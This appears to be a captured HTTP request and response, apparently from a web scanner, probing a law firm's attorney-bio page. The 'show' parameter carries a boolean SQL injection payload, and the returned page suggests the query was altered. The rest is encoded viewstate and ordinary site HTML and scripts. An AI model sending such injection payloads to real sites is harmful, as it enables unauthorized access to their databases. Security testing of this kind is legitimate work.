Jm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw Jm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw XDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw RURVQ0FUSU9OXDwvYlw XDwvc3Bhblw XDxiclw XDxiclw TEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw DQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w Oz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw XDxCUlw TUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw XDxCUlw XDwvQlw XDwvc3Bhblw DQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w XDxiclw XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Request

POST /new/showbionew.aspx?show='+OR+'ns'%3d'ns&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showbionew.aspx?show=1121&Related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 5788
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY%2bO2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPEJ1cnRvbiBXaW5uaWNrOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iQnVydG9uLFdpbm5pY2ssQnVydG9uIFdpbm5pY2ssQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zLFJlYWwgRXN0YXRlLFJlZGV2ZWxvcG1lbiIgXD4gOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iDQogTXIuIFdpbm5pY2sgaXMgb2ZmaWNlIG1hbmFnaW5nIHBhcnRuZXIgb2YgdGhlIGZpcm0ncyBCb3N0b24gT2ZmaWNlIGFuZCBhIHJlYWwgZXN0YXRlIHBhcnRuZXIgaW4gdGhlIGZpcm0ncyBSZWFsIEVzdGF0ZS8gQ29uc3RydWN0aW9uLyBFbnZpcm9ubWVudGFsIFByYWN0aWNlIEdyb3VwLiBIZSZuYnNwXDtyZXByZXNlbnRzIGxlbmRlcnMgaW4gbmVnb3RpYXRpbmcgYW5kIGRvY3VtZW50aW5nIHNlY3VyZWQgbG9hbiB0cmFuc2FjdGlvbnMiXD47Pj47Oz47dDw7bDxpPDA%2bOz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw%2bYWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw%2bOz4%2bOzs%2bOz4%2bO3Q8O2w8aTwxMz47PjtsPHQ8O2w8aTwxPjtpPDc%2bO2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bUFJBQ1RJQ0VTXDwvQlw%2bXDxCUlw%2bXDwvc3Bhblw%2bIFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw%2bQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw%2bLCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw%2bUmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw%2bDQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5IZSBpcyBhbHNvIGV4cGVyaWVuY2VkIGluIGNvbXBsZXggcmVhbCBlc3RhdGUgYWNxdWlzaXRpb25zIGFuZCBkaXNwb3NpdGlvbnMsIGNvbW1lcmNpYWwgbGVhc2luZywgb3duZXJzaGlwIHN0cnVjdHVyZXMsIHRheC1kZWZlcnJlZCBleGNoYW5nZXMsIGxvYW4gcmVzdHJ1Y3R1cmluZywgZm9yYmVhcmFuY2UgYWdyZWVtZW50cywgIndvcmtvdXRzIiBhbmQgZm9yZWNsb3N1cmVzLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5Nci4gV2lubmljayBoYXMgZXh0ZW5zaXZlIGV4cGVyaWVuY2UgaW4gcHJvcGVydHkgaW5zdXJhbmNlIG1hdHRlcnMgaW5jbHVkaW5nIHRoZSBoYW5kbGluZyBvZiBidWlsZGluZywgY29udGVudHMgYW5kIGJ1c2luZXNzIGludGVycnVwdGlvbiBjbGFpbXMgYW5kIHRoZSBkZXRlcm1pbmF0aW9uIG9mIGxvc3MgYW5kIGRhbWFnZSB0aHJvdWdoIHRoZSBSZWZlcmVuY2UgKGFyYml0cmF0aW9uKSBwcm9jZXNzLlw8L3BcPg0KXDxwXD5Nci4gV2lubmljaydzIHByYWN0aWNlIGFsc28gZm9jdXNlcyBvbiBnZW5lcmFsIGNvcnBvcmF0ZSBtYXR0ZXJzIGFuZCBidXNpbmVzcyB0cmFuc2FjdGlvbnMgYW5kIGhlIGNvdW5zZWxzIGhpcyBidXNpbmVzcyBjbGllbnRlbGUgd2l0aCByZXNwZWN0IHRvIHRoZSBhY3F1aXNpdGlvbiBhbmQgZGlzcG9zaXRpb24gb2YgYnVzaW5lc3MgYXNzZXRzLCBmaW5hbmNpbmcsIHJlYWwgcHJvcGVydHksIGVxdWlwbWVudCBsZWFzaW5nLCBjb250cmFjdHVhbCBhbmQgZW1wbG95bWVudCBtYXR0ZXJzIGFuZCBzdWNjZXNzaW9uIHBsYW5uaW5nLlw8c3Bhblw%2bJm5ic3BcOyBcPC9zcGFuXD5JbiBhZGRpdGlvbiwgTXIuIFdpbm5pY2sgbWFpbnRhaW5zIGEgc2lnbmlmaWNhbnQgYXV0b21vdGl2ZSBwcmFjdGljZSB3aGljaCBpbmNsdWRlcyB0aGUgYWNxdWlzaXRpb24gYW5kL29yIHNhbGUgb2YgYXV0b21vdGl2ZSBkZWFsZXJzaGlwcyBhbmQgdGhlIGZpbmFuY2luZyB0aGVyZW9mLCBwcm9wZXJ0eSBhY3F1aXNpdGlvbiBvciBhc3NvY2lhdGVkIGxlYXNpbmcsIG1hbnVmYWN0dXJlcnMnIGFncmVlbWVudHMsIGNvbnRyb2wgYWdyZWVtZW50cywgZXF1aXBtZW50IGxlYXNlcyBhbmQgb3duZXJzaGlwIHN0cnVjdHVyZS5cPC9wXD4NClw8cFw%2bXDxzcGFuXD5Nci4gV2lubmljayB3YXMgcmVjb2duaXplZCBhcyBhIE1hc3NhY2h1c2V0dHMgU3VwZXIgTGF3eWVyIGZvciAyMDA0LCAyMDA1LCAyMDA2Llw8L3NwYW5cPlw8L3BcPlw8L2Rpdlw%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8YnJcPlw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bRURVQ0FUSU9OXDwvYlw%2bXDwvc3Bhblw%2bXDxiclw%2bXDxiclw%2bTEwuQi4sIEJvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcsIDE5NjZcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuUy4sIFN1ZmZvbGsgVW5pdmVyc2l0eSwgMTk2Mzs%2bPjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlw8QlJcPkFETUlTU0lPTlNcPEJSXD5cPEJSXD5cPC9CXD5cPC9zcGFuXD4NCk1hc3NhY2h1c2V0dHNcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBEaXN0cmljdCBDb3VydCwgRGlzdHJpY3Qgb2YgTWFzc2FjaHVzZXR0c1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bDQpVbml0ZWQgU3RhdGVzIFN1cHJlbWUgQ291cnRcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bOz4%2bOzs%2bO3Q8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw%2bXDxCUlw%2bTUVNQkVSU0hJUFMgQU5EIFBST0ZFU1NJT05BTCBBQ1RJVklUSUVTXDxCUlw%2bXDxCUlw%2bXDwvQlw%2bXDwvc3Bhblw%2bDQpBbWVyaWNhbiBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KTWFzc2FjaHVzZXR0cyBCYXIgQXNzb2NpYXRpb25cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KQm9zdG9uIEJhciBBc3NvY2lhdGlvblw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w%2bXDxiclw%2bXDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD47Pj47Oz47Pj47Pj47Pj47PryijcfGDjG090UG3nv5PdrW3XqQ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26549



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>McCarter&amp;English | Michael Glasheen</title>
<META NAME="KEYWORDS" CONTENT="Michael,Glasheen,Michael Glasheen,Business & Financial Services Litigation" >
<META NAME="DESCRIPTION" CONTENT="Mr. Glasheen practices in the area of commercial litigation in federal and state trial and appellate courts with a current emphasis on life and disability carrier litigation.
Mr. Glasheen has represented insurance clients for 20 years. This experi">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">

P,TD,FONT,SPAN,DIV { COLOR: #666666; font-family: Arial; font-size: 11px; }
FONT { COLOR: #666666; font-family: Arial; font-size: 11px; }
A { text-decoration:none; }
A:Hover{ text-decoration:none; color:#000000; }
body { <!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;--> scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff; }
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="MARGIN-TOP:0px;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px">
<form name="Form1" method="post" action="showbionew.aspx?show='+OR+'ns'%3d'ns&amp;Related=3" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY+O2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPE1pY2hhZWwgR2xhc2hlZW47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxNRVRBIE5BTUU9IktFWVdPUkRTIiBDT05URU5UPSJNaWNoYWVsLEdsYXNoZWVuLE1pY2hhZWwgR2xhc2hlZW4sQnVzaW5lc3MgJiBGaW5hbmNpYWwgU2VydmljZXMgTGl0aWdhdGlvbiIgXD4gOz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iTXIuIEdsYXNoZWVuIHByYWN0aWNlcyBpbiB0aGUgYXJlYSBvZiBjb21tZXJjaWFsIGxpdGlnYXRpb24gaW4gZmVkZXJhbCBhbmQgc3RhdGUgdHJpYWwgYW5kIGFwcGVsbGF0ZSBjb3VydHMgd2l0aCBhIGN1cnJlbnQgZW1waGFzaXMgb24gbGlmZSBhbmQgZGlzYWJpbGl0eSBjYXJyaWVyIGxpdGlnYXRpb24uIA0KIE1yLiBHbGFzaGVlbiBoYXMgcmVwcmVzZW50ZWQgaW5zdXJhbmNlIGNsaWVudHMgZm9yIDIwIHllYXJzLiBUaGlzIGV4cGVyaSJcPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDEzPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw3PjtpPDk+O2k8MTE+O2k8MTM+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNwYW4gc3R5bGU9ImNvbG9yOiMwMDAwMDAiXD5cPEJcPlBSQUNUSUNFU1w8L0JcPlw8QlJcPlw8L3NwYW5cPiBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE0Ilw+QnVzaW5lc3MgJiBGaW5hbmNpYWwgU2VydmljZXMgTGl0aWdhdGlvbiBcPC9hXD5cPEJSXD47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxzcGFuIHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5QUklOQ0lQQUwgSU5EVVNUUklFU1w8QlJcPlw8L3NwYW5cPiBcPGEgaHJlZj0ic2hvd2luZHVzdHJ5bmV3LmFzcHg/U2hvdz0xNDE4Ilw+RmluYW5jaWFsIEluc3RpdHV0aW9uc1w8L2FcPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPHBcPk1yLiBHbGFzaGVlbiBwcmFjdGljZXMgaW4gdGhlIGFyZWEgb2YgY29tbWVyY2lhbCBsaXRpZ2F0aW9uIGluIGZlZGVyYWwgYW5kIHN0YXRlIHRyaWFsIGFuZCBhcHBlbGxhdGUgY291cnRzIHdpdG